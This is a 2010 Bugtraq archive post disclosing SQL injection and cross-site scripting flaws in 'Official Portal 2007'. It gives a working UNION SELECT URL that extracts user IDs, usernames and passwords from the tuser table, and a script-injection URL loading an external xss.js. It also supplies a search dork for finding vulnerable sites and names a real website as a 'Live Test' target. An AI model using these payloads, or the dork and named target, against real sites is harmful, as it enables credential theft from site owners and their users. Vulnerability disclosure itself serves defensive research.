Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Official Portal 2007 Multiple Vulnerabilities

From: info () securitylab ir
Date: Sun, 21 Feb 2010 01:44:45 -0700
#################################################################  
# Securitylab.ir  
#################################################################  
# Application Info:  
# Name: Official Portal 2007
#################################################################  
# Vulnerability Info:
# Type: Sql Injection/XSS
# Risk: Medium
# Dork: "Official Portal 2007"
#################################################################
Vulnerability:  
=======================  
Sql Injection
=======================  
http://site.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--

=======================  
Cross Site Scripting
=======================  
http://site.com/?fa=<SCRIPT/SRC="http://site.com/xss.js";></SCRIPT>
 
#################################################################  
Live Test: http://www.bkd-bandungkab.com
#################################################################  
# Discoverd By: Pouya Daneshmand  
# Website: http://securitylab.ir  
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################
Previous By Date Next
Previous By Thread Next

Current thread: